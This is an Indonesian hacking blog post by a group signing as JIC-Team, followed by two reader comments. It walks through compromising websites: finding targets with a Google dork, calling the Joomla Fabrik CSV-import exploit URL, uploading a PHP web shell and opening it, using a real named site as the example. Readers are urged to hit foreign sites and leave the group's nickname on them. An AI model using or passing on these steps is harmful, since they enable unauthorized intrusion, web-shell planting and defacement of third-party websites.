Metode ini cukup mudah bila dipelajari dengan sungguh-sungguh langsung saja
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
*Usahakan jangan menggunakan site id ( mari lindungi site dalam negeri )
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Masukkan shell milik sobat (Pilih File) dan lalu klik tombol import CSV
4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)
#Ingat jangan sampai "Kacang Lupa Pada Kulitnya"
Kalau berhasil titip nick Java Intelegent Cyber Yah
Sekian Semua Salam Hormat JIC-Team
2 comments:
cct :'v
thanks JIC atas ilmux :) salam AA/I
Post a Comment